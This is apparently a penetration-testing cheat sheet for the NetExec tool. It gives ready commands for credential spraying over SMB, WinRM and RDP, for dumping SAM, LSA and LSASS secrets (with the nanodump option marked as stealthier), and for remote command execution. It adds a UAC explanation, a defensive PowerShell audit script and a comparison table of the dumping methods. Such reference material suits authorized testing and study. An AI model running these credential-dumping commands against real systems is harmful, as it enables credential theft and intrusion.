# Netexec

### Useful Commands

```bash
# Domain account credential check for SMB, WinRM and RDP
netexec smb machines.txt -u 'user1' -p 'pass1' --continue-on-success
netexec winrm machines.txt -u 'user1' -p 'pass1' --continue-on-success
netexec rdp machines.txt -u 'user1' -p 'pass1' --continue-on-success

# Local account credential check for SMB, WinRM and RDP
netexec smb machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth
netexec winrm machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth
netexec rdp machines.txt -u 'user1' -p 'pass1' --continue-on-success --local-auth

# Dump SAM hashes (local admin rights needed; see the UAC note below on local vs. domain accounts)
netexec smb machines.txt -u 'user1' -p 'pass1' --sam

# Dump LSA secrets (local admin rights needed)
netexec smb machines.txt -u 'user1' -p 'pass1' --lsa
netexec smb machines.txt -u 'user1' -p 'pass1' --lsa secdump # deeper parsing (more verbose and sometimes more secrets)

# Dump LSASS (local admin rights needed)
netexec smb machines.txt -u 'user1' -p 'pass1' -M lsassy
netexec smb machines.txt -u 'user1' -p 'pass1' -M nanodump # stealthier than lsassy

# Execute commands
netexec smb 10.0.2.4 -u 'administrator' -p 'pass1' -X whoami
```

{% hint style="warning" %}
***Why does this not work with non-domain local admin accounts?***

Starting with **Windows Vista**, Microsoft introduced **UAC remote restrictions**. Local administrators logging in remotely do NOT receive a full admin token by default: members of the local Administrators group other than the built-in Administrator account get a **filtered token**. Because of this, those accounts cannot dump SAM, LSA or LSASS secrets remotely.

**Locally (console / RDP):**

* ✅ User can elevate via UAC prompt
* Full token is available

**Remotely (SMB / RPC / WMI / WinRM):**

* ❌ **No UAC prompt possible**
* User is forced to use the **filtered token**
{% endhint %}
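To verify the behaviour described above from the defender's side, the following audit script (an added example, not part of the original page or of NetExec) reads the `LocalAccountTokenFilterPolicy` value that controls UAC remote restrictions and classifies each member of the local Administrators group by the token it would receive over SMB/WinRM. It assumes the standard `Get-LocalGroupMember` cmdlet is available and is run on the Windows host being reviewed.

```powershell
# Added audit check (not from the original page). Reports whether UAC remote
# restrictions are still in force on this host and which Administrators members
# would obtain a full (unfiltered) token when authenticating remotely.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# LocalAccountTokenFilterPolicy: absent or 0 = remote restrictions in force
# (local admins other than RID 500 get a filtered token); 1 = restrictions disabled.
$item = Get-ItemProperty -Path $policyKey -Name 'LocalAccountTokenFilterPolicy' -ErrorAction SilentlyContinue
$filterPolicy = if ($null -eq $item) { 0 } else { [int]$item.LocalAccountTokenFilterPolicy }

if ($filterPolicy -eq 1) {
    Write-Warning 'LocalAccountTokenFilterPolicy=1: UAC remote restrictions are DISABLED; every local admin gets a full token remotely.'
} else {
    Write-Host "UAC remote restrictions in force (LocalAccountTokenFilterPolicy=$filterPolicy)."
}

# Walk the local Administrators group and classify each member.
Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
    $sid = $_.SID.Value
    $isBuiltinAdmin = $sid -like 'S-1-5-21-*-500'      # RID 500 = built-in Administrator
    $isLocal = ($_.PrincipalSource -eq 'Local')         # domain principals are never filtered
    $remoteToken = if (-not $isLocal)      { 'Full (domain principal)' }
                   elseif ($isBuiltinAdmin) { 'Full (built-in Administrator, exempt)' }
                   elseif ($filterPolicy -eq 1) { 'Full (policy disables filtering)' }
                   else                     { 'Filtered' }
    [PSCustomObject]@{
        Member      = $_.Name
        Source      = $_.PrincipalSource
        RemoteToken = $remoteToken
    }
} | Format-Table -AutoSize
```

Every row reporting `Full` for a local account is a host where the note above does not protect you; a `LocalAccountTokenFilterPolicy` of 1 is usually a deliberate change and should be justified or reverted.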

### Full comparison

| Feature             | `--sam`         | `--lsa`          | `lsassy`     | `nanodump`   |
| ------------------- | --------------- | ---------------- | ------------ | ------------ |
| Source              | Disk (SAM hive) | Registry secrets | LSASS memory | LSASS memory |
| Local hashes        | ✅               | ⚠️ Sometimes     | ✅            | ✅            |
| Domain creds        | ❌               | ✅                | ✅            | ✅            |
| Plaintext passwords | ❌               | ⚠️ Sometimes     | ✅            | ✅            |
| Kerberos tickets    | ❌               | ❌                | ✅            | ✅            |
| Stealth             | ⭐⭐⭐             | ⭐⭐⭐              | ⭐            | ⭐⭐⭐⭐         |
| Value               | Low–Medium      | Medium–High      | Very High    | Very High    |

